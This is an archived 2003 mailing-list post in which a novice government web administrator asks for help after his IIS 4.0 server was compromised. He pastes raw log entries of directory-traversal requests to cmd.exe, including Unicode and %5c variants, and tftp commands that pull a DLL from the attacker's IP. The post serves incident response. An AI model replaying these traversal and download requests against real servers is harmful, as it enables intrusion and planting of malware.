Hosting Provided By

Hacked web server

From: Rogelio Vidaurri Courcelle <rvidaurri(at)haciendachiapas.gob.mx>
Date: Fri Jan 10 2003 - 15:39:59 EST

Hi... my web server (NT 4.0 SP6a) was hacked last friday, it has only one NIC with a public IP
we have an OpenBSD Firewall (PF) that filters both incoming and outcoming traffic.... this firewall has no ip addresses..... external users have access to our web server only by port 80... we had a popup window in our default page.... i dont know if that's why he could hack our server.... i'm not an expert in these.. i'm a begineer.....
(my english is not perfect sorry for the inconviniences)... anyway.. we deleted that popup window and haven't been hacked again... we try to patch our server but the patch "destroyed" my IIS 4.0 and we had to reinstall everything....
in my LOGFILES i have te records of our visits.... and since 2 months ago it's been registering this:

200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0,
72, 275, 403, 5, GET, /scripts/root.exe, /c+dir, 
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0,
70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir, 
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,

125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir,

200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,

200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0,
79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -, 
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,

145, 261, 500, 123, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,

200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221,

16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir,

200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir, 
200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir,

i have read that it could be because of Nimda but i have scanned with the latest pattern and it found no viruses... only a backdoor trojan called ncx99.exe dropped in mailroot\drop\temp by the way, can i delete files inside that folder??? there's a rundlls32.exe... a KEY file, etcetera......

what can it be? i need help...
how could i trace the hacker??
thanks in advance.....

ISC. Rogelio Vidaurri Courcelle
Área de Sistemas y Web
Secretaría de Hacienda

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Sun Jan 12 15:43:34 2003

This message: [ Message body ]
Next message: Nick FitzGerald: "RE: Virus? Trojan?"
Previous message: James C Slora Jr: "RE: Virus? Trojan?"
Next in thread: Tibor Biro: "Re: Hacked web server"
Reply: Tibor Biro: "Re: Hacked web server"
Reply: Michael Katz: "Re: Hacked web server"
Reply: Ryan Yagatich: "Re: Hacked web server"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:56 EDT